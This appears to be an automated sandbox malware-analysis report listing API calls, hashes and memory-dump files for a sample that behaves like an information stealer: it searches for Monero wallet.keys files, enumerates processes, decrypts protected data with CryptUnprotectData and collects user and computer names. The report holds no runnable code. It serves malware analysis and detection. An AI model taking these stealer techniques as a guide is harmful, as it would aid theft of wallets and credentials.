Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 5e3bc6f79cd5095ef8d762bbaaf8d569a280070c46f492d888415eb37557079e
Instruction ID: 3e075d66ce69f5cec0202b2a744e04d40e2e1b991c26db4e219d1be247c282de
Opcode Fuzzy Hash: 5e3bc6f79cd5095ef8d762bbaaf8d569a280070c46f492d888415eb37557079e
Instruction Fuzzy Hash: 49413071940228ABDB24DB94EC99BEDB7B4FF54700F204199E509A2291DB342FC5CF92

Function 0081E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00830D73), ref: 0081E4A2
StrCmpCA.SHLWAPI(?,008314F8), ref: 0081E4F2
StrCmpCA.SHLWAPI(?,008314FC), ref: 0081E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0081EBDF

Strings

\*.*, xrefs: 0081E44D

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 9b8b029a441767ef63da61709a34e44d290a60f200e7a4caf9d63e5e75e983ca
Instruction ID: 1576c73f05e29b272ece7d72ad426d381f83e363f184c07f1082ea3dbe665c04
Opcode Fuzzy Hash: 9b8b029a441767ef63da61709a34e44d290a60f200e7a4caf9d63e5e75e983ca
Instruction Fuzzy Hash: 7B122D719101289BDB18FB68EC96AED7378FF54300F4045A9B50AD6192EE346FC9CB93

Function 00829600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0082961E
Process32First.KERNEL32(00830ACA,00000128), ref: 00829632
Process32Next.KERNEL32(00830ACA,00000128), ref: 00829647
StrCmpCA.SHLWAPI(?,00000000), ref: 0082965C
CloseHandle.KERNEL32(00830ACA), ref: 0082967A

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 42e9eb38e1c43e25076f9a2fe87532a750ee6f1b41bdb4827d1c297d90a0db49
Instruction ID: 290185c60d0026632816010e812f82aa276a43d1cd25ba1aca700777434d4723
Opcode Fuzzy Hash: 42e9eb38e1c43e25076f9a2fe87532a750ee6f1b41bdb4827d1c297d90a0db49
Instruction Fuzzy Hash: F7010CB5A00318ABCB14DFA5DD48BEDBBF8FB58701F104288E94AD6240E7349B85CF51

Function 00828680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008305B7), ref: 008286CA
Process32First.KERNEL32(?,00000128), ref: 008286DE
Process32Next.KERNEL32(?,00000128), ref: 008286F3

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

CloseHandle.KERNEL32(?), ref: 00828761

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 2cb3fc7c001df0c85691d31a0935d6e527818c8cf1e9c27485491628fda5e6f8
Instruction ID: eb2800f93cd133a6c6eb43e43d2d6295e2655797607d36996d3317503c19635a
Opcode Fuzzy Hash: 2cb3fc7c001df0c85691d31a0935d6e527818c8cf1e9c27485491628fda5e6f8
Instruction Fuzzy Hash: D9315071901228EBCB18DF94EC45FEEB778FF44700F1041A9E509E2190DB346A85CFA2

Function 00827A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00EFDF38,00000000,?,00830E10,00000000,?,00000000,00000000), ref: 00827A63
RtlAllocateHeap.NTDLL(00000000), ref: 00827A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00EFDF38,00000000,?,00830E10,00000000,?,00000000,00000000,?), ref: 00827A7D
wsprintfA.USER32 ref: 00827AB7

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: a5acaaeed5cd12d1e9459a643d4af5007e409c07495941ac2d60cb67af14bb6f
Instruction ID: 3e39985229cd6e2ff1f995b7ebbbb08869a1f8e0556eb007c11e8a960242070f
Opcode Fuzzy Hash: a5acaaeed5cd12d1e9459a643d4af5007e409c07495941ac2d60cb67af14bb6f
Instruction Fuzzy Hash: E91182B1A45228EBDB10CF54DC55F59B778F704721F104395E516D32C0C7741A40CF51

Function 00819B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00819B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00819BA3
LocalFree.KERNEL32(?), ref: 00819BD3

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 41b6f253c80c54a47facb6c2873f90c7757cba546a46db7599c6c1bc57787ed2
Instruction ID: 56fe207ae478af520f4bab84949af0d5ae410eca541d0c41000f3dd91c129458
Opcode Fuzzy Hash: 41b6f253c80c54a47facb6c2873f90c7757cba546a46db7599c6c1bc57787ed2
Instruction Fuzzy Hash: 6E11C9B8A00209EFDB04DF94D985AAEB7B9FF88301F104598F915A7350D774AE51CFA1

Function 008278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827910
RtlAllocateHeap.NTDLL(00000000), ref: 00827917
GetComputerNameA.KERNEL32(?,00000104), ref: 0082792F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 388b06669a48b55a6b7233c161e055ff275cd1882d11e430eb6c0223070cbdd4
Instruction ID: 1d46c5f2535ee21e101c04b42c445f4070b78b7dfa13dadd7c2b3956748867a7
Opcode Fuzzy Hash: 388b06669a48b55a6b7233c161e055ff275cd1882d11e430eb6c0223070cbdd4
Instruction Fuzzy Hash: 2F0162B1A04318EBC700DF95DD45BABBBB8F704B21F104219E645E2280C37859448BA1

Function 00827850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827880
RtlAllocateHeap.NTDLL(00000000), ref: 00827887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0082789F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: f2b14b093d1a6e4f911a30e2da32fd89adef19db48cc2ae6ce0249e2f4b215f3
Instruction ID: cbc39e7e89cad5fa71a68433112cdea0e5aa33d0e3eb2a788b7a6bd23d9cfd90
Opcode Fuzzy Hash: f2b14b093d1a6e4f911a30e2da32fd89adef19db48cc2ae6ce0249e2f4b215f3
Instruction Fuzzy Hash: 86F044B1A44208ABC704DFD5DD45BAEBBB8F708711F100259FA15E2780C77415458BA1

Function 00811160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0081116A
ExitProcess.KERNEL32 ref: 0081117E

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
